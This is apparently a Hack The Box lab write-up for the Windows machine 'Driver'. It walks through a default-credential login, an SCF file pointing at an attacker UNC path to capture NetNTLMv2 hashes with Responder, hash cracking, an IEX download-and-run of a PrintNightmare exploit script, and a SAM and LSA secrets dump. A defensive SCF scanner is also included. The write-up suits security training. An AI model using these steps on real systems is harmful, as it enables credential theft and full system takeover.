Hack-The-Box-walkthrough[Driver]

Introduction

OS: Windows
Difficulty: Easy
Points: 20
Release: 02 Oct 2021
IP: 10.10.11.106


Enumeration

Nmap

┌──(root💀kali)-[~/hackthebox/machine/driver]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.106
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Web

We are greeted with a login pop-up, and admin/admin gets us in.

The site lets us upload printer firmware, so it looks like we could upload a malicious firmware file and get a reverse shell.

After looking for exploits I could not find any, but the interesting part is that the uploaded files are probably saved to an SMB share on the Windows host.

So we have a remote file upload, and we can turn it into an SMB attack via NTLM capture:

  • SMB Penetration Testing Port 445

  • SMB - SCF File Attacks - NetNTLMv2 hash grab

Create a file named shell.scf:

[Shell]
Command=2
IconFile=\\10.10.14.18\share\test.ico
[Taskbar]
Command=ToggleDesktop

Start Responder:

responder -wrf --lm -v -I tun0

Upload the file via the website.

Wait, and Responder captures the hash:

┌──(root💀kali)-[~/hackthebox/machine/driver]
└─# responder -wrf --lm -v -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.0.6.0

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [ON]
Fingerprint hosts [ON]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.18]
Challenge set [random]
Don't Respond To Names ['ISATAP']

[+] Current Session Variables:
Responder Machine Name [WIN-M7QNFNTIUS5]
Responder Domain Name [DF9J.LOCAL]
Responder DCE-RPC Port [46013]

[+] Listening for events...

[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash : tony::DRIVER:5d8b8082ef776c2f:A4327A2CB72A96CEEF1D04DB2636CFD0:010100000000000003D6341085B8D7014158EED0F177C50C00000000020000000000000000000000
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash : tony::DRIVER:d749730738bd8506:D1A35D9A4D7ABF916EECA6D6DE25B8A2:01010000000000003E05281185B8D7012A802D00F1FA40CD00000000020000000000000000000000
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash : tony::DRIVER:bd3860c306965ce9:1A699EF18915FF2D76CB965CB4F7E914:0101000000000000511B141285B8D7013F3164731463EC4A00000000020000000000000000000000
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash : tony::DRIVER:c92c9da2314211e4:DCA91CAF8B4ADFB918B987CA6226FD6A:0101000000000000FF16001385B8D70184E50D8129DC7EE500000000020000000000000000000000
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash : tony::DRIVER:352a6a321addb118:B201C24A20A2010D1B280F4EC2A6380A:01010000000000003CBDE91385B8D7017D6ACD474960E4F800000000020000000000000000000000
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash : tony::DRIVER:7e2adbd91e974841:6E1A74933AE2E19D06C8C03F61D44A89:0101000000000000836BD31485B8D70118B057D21124042400000000020000000000000000000000
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash : tony::DRIVER:9d11f8dc195ba210:633773D52C813CC8C252F5F100B67287:0101000000000000340ABD1585B8D701B38BD32127FADDD500000000020000000000000000000000
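The reason this works is that Explorer resolves the IconFile entry of any .scf file it renders, and a UNC path in that entry makes the host authenticate to whatever server the path names. As an added defender-side check (this is not part of the original walkthrough), the script below parses SCF files the way a share or upload scanner would and flags any entry that is a UNC path to a host outside an allow-list. The malicious sample is the shell.scf from this writeup; the benign sample, the trusted host name `fileserver01.corp.example` and the directory-scan helper are constructed for the example.

```python
import re
from pathlib import Path

# UNC prefix: \\host\share\...  (Windows also accepts the //host/share form)
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)[\\/]")

# Constructed sample 1: the shell.scf used in this writeup, IconFile pointing at the attacker box
SCF_CAPTURE = r"""[Shell]
Command=2
IconFile=\\10.10.14.18\share\test.ico
[Taskbar]
Command=ToggleDesktop
"""

# Constructed sample 2: the stock "Show Desktop" SCF, icon taken from a local binary
SCF_BENIGN = r"""[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
"""


def parse_scf(text):
    """Parse the INI-like SCF layout into {section: {key: value}} (names lowercased)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def unc_host(path):
    """Return the host part of a UNC path, or None if the value is not UNC."""
    m = UNC_RE.match(path)
    return m.group(1).lower() if m else None


def scf_findings(text, trusted_hosts=()):
    """List (section.key, host) for every value that reaches out to a UNC host
    not in trusted_hosts. An empty list means the file only references local resources."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for section, entries in parse_scf(text).items():
        for key, value in entries.items():
            host = unc_host(value)
            if host and host not in trusted:
                findings.append((f"{section}.{key}", host))
    return findings


def scan_directory(root, trusted_hosts=()):
    """Walk a share or upload folder and report every .scf file with findings."""
    report = {}
    for path in Path(root).rglob("*.scf"):
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = scf_findings(text, trusted_hosts)
        if hits:
            report[str(path)] = hits
    return report


if __name__ == "__main__":
    trusted = ["fileserver01.corp.example"]  # constructed allow-list
    print("captured shell.scf :", scf_findings(SCF_CAPTURE, trusted))
    print("stock Show Desktop :", scf_findings(SCF_BENIGN, trusted))
```

Run it against the directory behind the firmware upload (or any writable share) on a schedule; a hit with a host that is not a known file server is a strong indicator of exactly the capture shown above. The same check applies to .url and .lnk files, which carry icon paths too.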

The hashcat mode for NetNTLMv2 is 5600. Save one captured line to a file:

tony::DRIVER:5d8b8082ef776c2f:A4327A2CB72A96CEEF1D04DB2636CFD0:010100000000000003D6341085B8D7014158EED0F177C50C00000000020000000000000000000000

Cracked:

hashcat64.exe -a 0 -m 5600 password.txt rockyou.txt

TONY::DRIVER:5d8b8082ef776c2f:a4327a2cb72a96ceef1d04db2636cfd0:010100000000000003d6341085b8d7014158eed0f177c50c00000000020000000000000000000000:liltony

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NetNTLMv2
Hash.Target......: TONY::DRIVER:5d8b8082ef776c2f:a4327a2cb72a96ceef1d0...000000
Time.Started.....: Sun Oct 03 19:56:45 2021 (1 sec)
Time.Estimated...: Sun Oct 03 19:56:46 2021 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 31819.1 kH/s (6.38ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 1048576/14344360 (7.31%)
Rejected.........: 0/1048576 (0.00%)
Restore.Point....: 0/14344360 (0.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#2....: 123456 -> Leslie08
Hardware.Mon.#2..: Temp: 49c Util: 6% Core:1632MHz Mem:3802MHz Bus:16

Started: Sun Oct 03 19:56:42 2021
Stopped: Sun Oct 03 19:56:48 2021

Credentials: tony / liltony

Use evil-winrm to log in:

┌──(root💀kali)-[~/hackthebox/machine/driver]
└─# evil-winrm -i 10.10.11.106 -u tony -p liltony

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\tony\Desktop> whoami
driver\tony
*Evil-WinRM* PS C:\Users\tony\Desktop> cat user.txt
a605c8dc202b75b68359640f43d14212

Root

Running winPEAS shows a system service, spoolsv, which is the Print Spooler service.

We can exploit it for local privilege escalation:

  • CVE-2021-1675 - PrintNightmare LPE - PowerShell

  • Playing with PrintNightmare - 0xdf

Following the steps gives an error that running scripts is disabled.

A meterpreter shell does not help here either: you can import the module, but you can't then run Invoke-Nightmare; the shell will die.

Workaround

Spin up a local web server and download the script with IEX; it imports the module as it runs, so Invoke-Nightmare can be called straight away:

*Evil-WinRM* PS C:\Users\tony\Desktop> IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.18/CVE-2021-1675.ps1')
*Evil-WinRM* PS C:\Users\tony\Desktop> Invoke-Nightmare -NewUser "luci" -NewPassword "luci11"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user luci as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll

And we are administrator now:

┌──(root💀kali)-[~/hackthebox/machine/driver]
└─# evil-winrm -i 10.10.11.106 -u luci -p luci11

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\luci\Documents> whoami
driver\luci
*Evil-WinRM* PS C:\Users\luci\Documents> cat \Users\Administrator\Desktop\root.txt
d93ef08c4ef67ae0ae771a2048ca6e75

Get the administrator's NTLM hash with secretsdump.py:

┌──(root💀kali)-[~/hackthebox/machine/driver]
└─# secretsdump.py luci@10.10.11.106
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

Password: luci11
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe5b3cda034afd685bc69ccd3c4e9387c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d1256cff8b5b5fdb8c327d3b6c3f5017:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
tony:1003:aad3b435b51404eeaad3b435b51404ee:dfdb5b520de42ca5d1b84ce61553d085:::
luci:1004:aad3b435b51404eeaad3b435b51404ee:b7e822b81dec47522161ecad82d1aaef:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
DRIVER\tony:liltony
[*] DPAPI_SYSTEM
dpapi_machinekey:0x68d8efd1bd3fa3ab206268f0bbc6e2a4a5e4b43e
dpapi_userkey:0x68060403e8f0276a683ad704b45dc7b850d9722f
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

Summary of knowledge

  • SMB Penetration Testing Port 445
  • SMB - SCF File Attacks - NetNTLMv2 hash grab using Responder
  • NetNTLMv2 hash cracking using hashcat (mode 5600)
  • Evil-WinRM shell usage
  • CVE-2021-1675 - PrintNightmare LPE - PowerShell
  • Dumping the administrator's NTLM hash with secretsdump.py

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…